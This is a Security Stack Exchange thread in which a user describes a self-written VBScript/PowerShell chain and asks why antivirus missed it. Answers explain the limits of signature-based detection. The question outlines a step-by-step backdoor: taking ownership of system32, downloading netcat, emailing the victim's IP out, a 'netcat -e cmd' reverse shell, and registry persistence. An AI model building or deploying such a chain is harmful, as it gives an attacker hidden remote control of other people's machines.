0

I am quite new to this type of stuff and I'm experimenting a little bit. This weekend I had some spare time and decided to joke around with VBScript and powershell. What I did is I wrote a VBScript which can be run as normal user or as administrator and does the following when run:

  1. Creates a .bat script and inserts the code manually in the script line by line and then executes it. The .bat contains:

    • A takeown command for system32, sysWOW64 (if run as administrator of course)
    • An icacls command that makes the above folders modifiable by anyone
    • Runs the previously created powershell script
    • Adds a .vbs in the local machine registry to run at startup as system

  2. Creates a powershell script and inserts the code manually in the script line by line. The .ps1 contains:

    • First it downloads netcat
    • Then proceeds to unzip the downloaded file
    • Then grabs the systems username and public ip
    • Sends the data via smtp to a specified email
    • Finally it executes netcat.exe with arguments: "netcat.exe -e cmd {listening servers public ip} {port}"

  3. Creates another .vbs and inserts the code line by line manually (which will run on startup as stated in the .bat). The .vbs contains:

    • A do while loop that every 5 minutes it runs a .bat file that contains "netcat.exe -e cmd {listening servers public ip} {port}" as a command (so I can have a persistent backdoor)

  4. A .bat file that contains only one command:

    • "netcat.exe -e cmd {listening servers public ip} {port}"

  5. Run the .bat in the background hidden from the user

On the "attacker" side i have netcat opened listening on the specified port. I was able to get an elevated cmd without any triggering of AV (Tested with Avira, ESET).

This works on Windows 7, 8, 10 x64 and i made it support both powershell v. <3 and v. >3.

What I achieved is an elevated cmd with persistence without triggering AV detection and it seemed very easy to achieve.

Should this have been detected as a potential threat by the antivirus software and remove it from the system? I am able to accomplish remote code execution and gain full access to the target system

This project was executed in a local environment which I own. I have no intentions of anything else

schroeder
  • 123,438
  • 55
  • 284
  • 319
Anonymous
  • 1
  • 1
  • `Dim WinScriptHost Set WinScriptHost = CreateObject("WScript.Shell") WinScriptHost.Run Chr(34) & NewPath & Chr(34), 0 Set WinScriptHost = Nothing` is used for runing the files hidden from user in the background. The only reason i didn't share the source code is to prevent people to exploit it. Edited question to be more precise – Anonymous Jan 22 '18 at 13:17
  • 3
    So, you download something, unpack it, send emails, write files, then execute a binary. What is there to detect? User's do this all the time in normal operation. I think the real issue here is just how limited AV is. What you would need is a HIDS system that analyses *behaviours*. – schroeder Jan 22 '18 at 13:48
  • I removed all parts asking for comments and critiques on your coding approach (off-topic) – schroeder Jan 22 '18 at 13:51
  • Well for example, when i tried to download and unpack the files directly from the vbs script, the same second i saved the code it got instantly deleted by my AV and marked it as trojan.downloader. – Anonymous Jan 22 '18 at 13:53
  • The main thing was that I was very curious whether it was that easy to achieve RCE with persistence without raising any suspison, not that I am some kind of "hacking" guru that beat the system and now i want to brag about it. – Anonymous Jan 22 '18 at 13:56
  • this isnt malware, its simply a persistent backdoor – CaffeineAddiction Jan 22 '18 at 14:19

2 Answers2

4

I think your issue is about the concept behind malware. A malware is a software that does more than you expect it to do. Or a software that does what you don't want it to do.

If I make a piece of software that deletes everything on my computer, it's not a malware, it's legit, I want that to happen.

If I give it to a friend and tell him : Hey check out this funny little game, he'll come to me (punch me in the face) and ask : why did you send me a malware ?!

So it all depends on the context. You made a piece of software that does legit stuff. What you are trying to achieve will make it or not a malware.

As for your Edit : I'm not an expert about AV but from what i know, they look for patterns. Writing you own malware/virus with only legit code would make it almost indetectable, because you are not using any pattern the AV knows. The point here is you don't use any breach, there is no security exploits. You are not excessing your rights, nor exiting any application scope. You've just created a tool to connect to another computer and to execute command.

i would take the exemple of the recent Meltdown and Spectre exploit. They are very dangerous not because at this time, no AV knows how to detect it, but because Av would likely never know how to detect it, because it is 100% legit code. Because it is 100% legit, there is infinit ways to write an exploit. And so, no patterns would come up.

Guillaume Beauvois
  • 411
  • 4
  • 11
0

Short answer: yes it is that easy, but it is not a surprise, either.

What makes malware dangerous is not what it does, but how it does it. Opening files, writing files, downloading things, opening network connections. A video game does all those things. None of them is inherently "bad".

Your "malware" has several non-malware points that allows it to evade AV detection:

  • it's a pure binary that can be identified in the task manager
  • it leaves a lot of artefacts around
  • a directly connected shell

A manual inspection will turn these things up, and some of those things will even be logged. It's not "stealthy". Stealthy code is what AV tends to look for (like your trojan horse incident).

That's why ransomware hit so hard when it arrived. It didn't need to be stealthy or even clever.

What you need, in your case, is something to analyse behaviour. Should Powershell be doing these things? Is the code signed? Is netcat a valid binary to run? Behaviour analysis looks at the context of innocuous actions to determine if it should be classified as malicious.

So, no, no one is surprised that AV didn't catch these things. But, it's not designed to.

schroeder
  • 123,438
  • 55
  • 284
  • 319